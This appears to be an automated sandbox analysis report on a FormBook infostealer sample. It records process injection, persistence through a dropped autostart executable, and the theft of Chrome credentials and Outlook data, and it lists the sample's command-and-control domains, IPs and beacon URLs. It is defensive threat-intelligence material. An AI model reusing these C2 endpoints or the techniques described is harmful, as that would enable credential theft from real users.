                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.830332751.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.830332751.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Shared Modules                		11
                Registry Run Keys / Startup Folder                		512
                Process Injection                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium3
                Ingress Tool Transfer                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                PowerShell                		Boot or Logon Initialization Scripts11
                Registry Run Keys / Startup Folder                		11
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		Exfiltration Over Bluetooth12
                Encrypted Channel                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)4
                Obfuscated Files or Information                		Security Account Manager121
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration4
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                Software Packing                		NTDS2
                Process Discovery                		Distributed Component Object Model1
                Input Capture                		Scheduled Transfer15
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Timestomp                		LSA Secrets31
                Virtualization/Sandbox Evasion                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common21
                Masquerading                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion                		DCSync1
                Remote System Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job512
                Process Injection                		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Rundll32                		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 774219 Sample: SecuriteInfo.com.W32.MSIL_K... Startdate: 27/12/2022 Architecture: WINDOWS Score: 100 41 Snort IDS alert for network traffic 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus detection for URL or domain 2->45 47 11 other signatures 2->47 8 SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe 5 2->8         started        process3 file4 27 C:\Users\user\AppData\Roaming\...\cloud.exe, PE32 8->27 dropped 29 C:\Users\user\...\cloud.exe:Zone.Identifier, ASCII 8->29 dropped 31 SecuriteInfo.com.W...24241.10847.exe.log, ASCII 8->31 dropped 59 Creates an undocumented autostart registry key 8->59 61 Encrypted powershell cmdline option found 8->61 63 Drops executable to a common third party application directory 8->63 12 MSBuild.exe 8->12         started        15 powershell.exe 16 8->15         started        signatures5 process6 signatures7 65 Modifies the context of a thread in another process (thread injection) 12->65 67 Maps a DLL or memory area into another process 12->67 69 Sample uses process hollowing technique 12->69 71 Queues an APC in another process (thread injection) 12->71 17 explorer.exe 12->17 injected 21 conhost.exe 15->21         started        process8 dnsIp9 33 www.scastive.online 162.254.33.214, 49700, 49701, 80 VIVIDHOSTINGUS United States 17->33 35 bip39chain.info 185.253.34.81, 49714, 49715, 80 THEFIRST-ASRU Russian Federation 17->35 37 19 other IPs or domains 17->37 49 System process connects to network (likely due to code injection or exploit) 17->49 23 rundll32.exe 13 17->23         started        signatures10 process11 dnsIp12 39 www.hiufouwnwk.shop 23->39 51 System process connects to network (likely due to code injection or exploit) 23->51 53 Tries to steal Mail credentials (via file / registry access) 23->53 55 Tries to harvest and steal browser information (history, passwords, etc) 23->55 57 2 other signatures 23->57 signatures13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe35%ReversingLabs
                SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe100%AviraTR/Crypt.XPACK.Gen7
                SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exe100%AviraTR/Crypt.XPACK.Gen7
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exe35%ReversingLabs

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.0.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.d40000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                3.0.MSBuild.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                www.forumhtc.com0%VirustotalBrowse
                www.elite-travel-cn.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://james.newtonking.com/projects/json0%URL Reputationsafe
                http://www.3658622bet.com/p6a2/?PJsOe=ZZiBudAdKkOjfCQP3JltneA7CA4H+oDcc2F0cF2NCUrgNT/O3PII+zj7tY9WUUQehw4FhZlrF4CxwEcOrzTPe++T19aYNqzGtA==&4u=XXw8ZRfd00%Avira URL Cloudsafe
                http://www.dubmoviedaaa.com/p6a2/?4u=XXw8ZRfd0&PJsOe=LKTpzSYaad7RY09JlOwiwWKJMKTbKDNtKtFdzgs46VqeU13weoYdOe5FHZNBqvs7M9aWsXvPLdZvpHBZqtvQwjuXQVIPrJpS5Q==100%Avira URL Cloudmalware
                http://www.byfuture.biz/p6a2/0%Avira URL Cloudsafe
                http://www.cobramierer.com/p6a2/?4u=XXw8ZRfd0&PJsOe=qpkXmqYajFP/MwMsH85/xAR+HuOV3BhXfepUxIkOb3Nti8d1pwDCNiT47pq1pm9vxSngzgxeICaYyJ2YpLhtuPpEAFm4f33eOg==100%Avira URL Cloudmalware
                http://www.bip39chain.info/p6a2/0%Avira URL Cloudsafe
                http://www.bip39chain.info/p6a2/?4u=XXw8ZRfd0&PJsOe=guYE1BSZ9235N2CnAWofHh5ttYffxi6Or7I/zjjksNN0K1CgBVtEgiG+Hh20F/wLWeO5bKswCo7tklXGWOtZJphg6sBhJOhSXw==0%Avira URL Cloudsafe
                https://realtxt.co.uk/static/css/bootstrap.min.css0%Avira URL Cloudsafe
                https://realtxt.co.uk/pricing0%Avira URL Cloudsafe
                http://www.elite-travel-cn.com/p6a2/100%Avira URL Cloudmalware
                http://www.glb-mobility.com/p6a2/?PJsOe=/9zhY/Qa6PbuzUJJeFENEisDBASeGLQuA2DsbQL1c4XMJeUN1UEfvc0JnTkLGaGl6hcCibpmZrBf1fZuQl6EVbtQGhHUTPfVDw==&4u=XXw8ZRfd00%Avira URL Cloudsafe
                https://realtxt.co.uk/page/terms0%Avira URL Cloudsafe
                https://realtxt.co.uk/user/login0%Avira URL Cloudsafe
                http://www.glb-mobility.com/p6a2/0%Avira URL Cloudsafe
                https://realtxt.co.uk/static/js/jquery.min.js0%Avira URL Cloudsafe
                http://www.4tx.ru/p6a2/?PJsOe=v0jYY1ytl5PH6OIBhUa985ktrnV9EUxQvf0paGzXVH/pO6il62dTlsncR7GNVbW/vhBZVRhGCtJzQ8DjGp6vLGYCApLjgmmFaA==&4u=XXw8ZRfd00%Avira URL Cloudsafe
                http://www.dubmoviedaaa.com/p6a2/100%Avira URL Cloudmalware
                https://realtxt.co.uk/themes/cleanex/style.css0%Avira URL Cloudsafe
                http://www.scastive.online/p6a2/100%Avira URL Cloudmalware
                http://www.elite-travel-cn.com/p6a2/?PJsOe=xeOhXlH059OOkCPPeiyznifX6DCn6GLjVIPb0HMEaj6kEld1NZvpN20tPmlU3A5oPB4rwbGiD40G1zaemtArGBjdZepieKoLuQ==&4u=XXw8ZRfd0100%Avira URL Cloudmalware
                https://realtxt.co.uk/themes/cleanex/assets/js/main.js0%Avira URL Cloudsafe
                https://domaincntrol.com/?orighost=0%Avira URL Cloudsafe
                http://www.forumhtc.com/p6a2/?4u=XXw8ZRfd0&PJsOe=KR55po+9d10KX8Xj90KZyobZiDa/RtTgSn49Skh//ClUMGayigisS5MQTeINbAsCVfjq5Ep4Iv+TWpG/o+Gu0gk7nNTNW0LRWQ==0%Avira URL Cloudsafe
                http://www.4tx.ru/p6a2/0%Avira URL Cloudsafe
                http://newhard.ru/p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXf100%Avira URL Cloudmalware
                https://realtxt.co.uk/user/register0%Avira URL Cloudsafe
                https://www.loaddown.vip/p6a2/?4u=XXw8ZRfd0&PJsOe=o0oMI0%Avira URL Cloudsafe
                http://www.realtxt.co.uk/p6a2/0%Avira URL Cloudsafe
                https://realtxt.co.uk/static/application.fn.js0%Avira URL Cloudsafe
                https://realtxt.co.uk/static/server.js0%Avira URL Cloudsafe
                http://www.realtxt.co.uk/p6a2/?4u=XXw8ZRfd0&PJsOe=dUX/NCfS/ohFC7O80P17jduoKXecdoXu/c+jqkCFku2HIELrCmlysUdsWMmXDmnAL0wy8gVH6BIzEQuoLfScbNDGrSU7SZcpQA==0%Avira URL Cloudsafe
                http://www.newhard.ru/p6a2/100%Avira URL Cloudmalware
                https://realtxt.co.uk/blog0%Avira URL Cloudsafe
                http://www.byfuture.biz/p6a2/?PJsOe=tRwStDBOqpxrJTuJxG0qdx4zeeLq0lB6PIjn8XuQC4/eCDjBGzFZ7gNi69QxogIVbIfegutMJNyvrWeKAaI2x4/UCc3VFVMIlw==&4u=XXw8ZRfd00%Avira URL Cloudsafe
                http://www.scastive.online/p6a2/?PJsOe=eJZ19xYC8GRyuRPgB3K3hYHN997ZzA7xE9BAJMP39dttW2h4vf6lg00rKUwCf45owTZaCQIOMq2NpT3yCXeggU/kVHtPphUyBg==&4u=XXw8ZRfd0100%Avira URL Cloudmalware
                http://www.loaddown.vip/p6a2/100%Avira URL Cloudmalware
                http://www.adelaidesociety.com/p6a2/?4u=XXw8ZRfd0&PJsOe=pjY5HSUHAkIjJTnjTuXZqIQD+upstRzJTGdDpMtHb2G7EDTOYPy+SC0sAwePybO7Bg4lDq58C8rolUandfOM6VH00Jlr+bNPuQ==0%Avira URL Cloudsafe
                http://www.newhard.ru/p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfEa/HBDnsFpMkr8eF2T22317iGL4Q==&4u=XXw8ZRfd0100%Avira URL Cloudmalware
                https://realtxt.co.uk/static/bootstrap.min.js0%Avira URL Cloudsafe
                http://www.forumhtc.com/p6a2/0%Avira URL Cloudsafe
                http://www.cobramierer.com/p6a2/100%Avira URL Cloudmalware
                http://www.3658622bet.com/p6a2/0%Avira URL Cloudsafe
                https://realtxt.co.uk/static/application.js0%Avira URL Cloudsafe
                https://realtxt.co.uk/static/css/components.min.css0%Avira URL Cloudsafe
                https://realtxt.co.uk0%Avira URL Cloudsafe
                https://realtxt.co.uk/contact0%Avira URL Cloudsafe
                https://realtxt.co.uk/static/css/fa-all.min.css0%Avira URL Cloudsafe
                https://realtxt.co.uk/report0%Avira URL Cloudsafe
                http://www.hiufouwnwk.shop/p6a2/?4u=XXw8ZRfd0&PJsOe=ZgRZpMDYqcRIPQpAVsyf63QGrqbxGqVGJ2Bchc7mGSCh2JTc0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.forumhtc.com
                		166.88.175.130
                		truetrueunknown
                www.4tx.ru
                		141.8.195.124
                		truetrue
                  		unknown
                  www.elite-travel-cn.com
                  		107.149.40.247
                  		truetrueunknown
                  realtxt.co.uk
                  		192.46.208.151
                  		truetrue
                    		unknown
                    glb-mobility.com
                    		88.99.217.197
                    		truetrue
                      		unknown
                      www.scastive.online
                      		162.254.33.214
                      		truetrue
                        		unknown
                        smart.https-t-me-okver.cdnv0.com
                        		64.64.253.213
                        		truetrue
                          		unknown
                          www.dubmoviedaaa.com
                          		64.225.91.73
                          		truetrue
                            		unknown
                            bip39chain.info
                            		185.253.34.81
                            		truetrue
                              		unknown
                              www.hiufouwnwk.shop
                              		127.0.0.1
                              		truetrue
                                		unknown
                                www.newhard.ru
                                		194.58.112.174
                                		truetrue
                                  		unknown
                                  www.byfuture.biz
                                  		146.148.102.201
                                  		truefalse
                                    		unknown
                                    www.loaddown.vip
                                    		35.77.200.33
                                    		truetrue
                                      		unknown
                                      088-356.com
                                      		185.224.170.82
                                      		truetrue
                                        		unknown
                                        www.adelaidesociety.com
                                        		35.213.254.232
                                        		truetrue
                                          		unknown
                                          www.cobramierer.com
                                          		176.28.33.25
                                          		truetrue
                                            		unknown
                                            www.3658622bet.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.glb-mobility.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.060jinbo.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.realtxt.co.uk
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.bip39chain.info
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.cobramierer.com/p6a2/?4u=XXw8ZRfd0&PJsOe=qpkXmqYajFP/MwMsH85/xAR+HuOV3BhXfepUxIkOb3Nti8d1pwDCNiT47pq1pm9vxSngzgxeICaYyJ2YpLhtuPpEAFm4f33eOg==true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.dubmoviedaaa.com/p6a2/?4u=XXw8ZRfd0&PJsOe=LKTpzSYaad7RY09JlOwiwWKJMKTbKDNtKtFdzgs46VqeU13weoYdOe5FHZNBqvs7M9aWsXvPLdZvpHBZqtvQwjuXQVIPrJpS5Q==true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.elite-travel-cn.com/p6a2/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.byfuture.biz/p6a2/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bip39chain.info/p6a2/?4u=XXw8ZRfd0&PJsOe=guYE1BSZ9235N2CnAWofHh5ttYffxi6Or7I/zjjksNN0K1CgBVtEgiG+Hh20F/wLWeO5bKswCo7tklXGWOtZJphg6sBhJOhSXw==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.3658622bet.com/p6a2/?PJsOe=ZZiBudAdKkOjfCQP3JltneA7CA4H+oDcc2F0cF2NCUrgNT/O3PII+zj7tY9WUUQehw4FhZlrF4CxwEcOrzTPe++T19aYNqzGtA==&4u=XXw8ZRfd0true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bip39chain.info/p6a2/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.glb-mobility.com/p6a2/?PJsOe=/9zhY/Qa6PbuzUJJeFENEisDBASeGLQuA2DsbQL1c4XMJeUN1UEfvc0JnTkLGaGl6hcCibpmZrBf1fZuQl6EVbtQGhHUTPfVDw==&4u=XXw8ZRfd0true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.4tx.ru/p6a2/?PJsOe=v0jYY1ytl5PH6OIBhUa985ktrnV9EUxQvf0paGzXVH/pO6il62dTlsncR7GNVbW/vhBZVRhGCtJzQ8DjGp6vLGYCApLjgmmFaA==&4u=XXw8ZRfd0true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dubmoviedaaa.com/p6a2/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.glb-mobility.com/p6a2/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.scastive.online/p6a2/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.elite-travel-cn.com/p6a2/?PJsOe=xeOhXlH059OOkCPPeiyznifX6DCn6GLjVIPb0HMEaj6kEld1NZvpN20tPmlU3A5oPB4rwbGiD40G1zaemtArGBjdZepieKoLuQ==&4u=XXw8ZRfd0true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.4tx.ru/p6a2/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.forumhtc.com/p6a2/?4u=XXw8ZRfd0&PJsOe=KR55po+9d10KX8Xj90KZyobZiDa/RtTgSn49Skh//ClUMGayigisS5MQTeINbAsCVfjq5Ep4Iv+TWpG/o+Gu0gk7nNTNW0LRWQ==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.realtxt.co.uk/p6a2/?4u=XXw8ZRfd0&PJsOe=dUX/NCfS/ohFC7O80P17jduoKXecdoXu/c+jqkCFku2HIELrCmlysUdsWMmXDmnAL0wy8gVH6BIzEQuoLfScbNDGrSU7SZcpQA==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.newhard.ru/p6a2/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.realtxt.co.uk/p6a2/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.byfuture.biz/p6a2/?PJsOe=tRwStDBOqpxrJTuJxG0qdx4zeeLq0lB6PIjn8XuQC4/eCDjBGzFZ7gNi69QxogIVbIfegutMJNyvrWeKAaI2x4/UCc3VFVMIlw==&4u=XXw8ZRfd0false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.scastive.online/p6a2/?PJsOe=eJZ19xYC8GRyuRPgB3K3hYHN997ZzA7xE9BAJMP39dttW2h4vf6lg00rKUwCf45owTZaCQIOMq2NpT3yCXeggU/kVHtPphUyBg==&4u=XXw8ZRfd0true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.forumhtc.com/p6a2/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.3658622bet.com/p6a2/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.adelaidesociety.com/p6a2/?4u=XXw8ZRfd0&PJsOe=pjY5HSUHAkIjJTnjTuXZqIQD+upstRzJTGdDpMtHb2G7EDTOYPy+SC0sAwePybO7Bg4lDq58C8rolUandfOM6VH00Jlr+bNPuQ==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.newhard.ru/p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfEa/HBDnsFpMkr8eF2T22317iGL4Q==&4u=XXw8ZRfd0true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.cobramierer.com/p6a2/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.loaddown.vip/p6a2/true
                                                      • Avira URL Cloud: malware
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
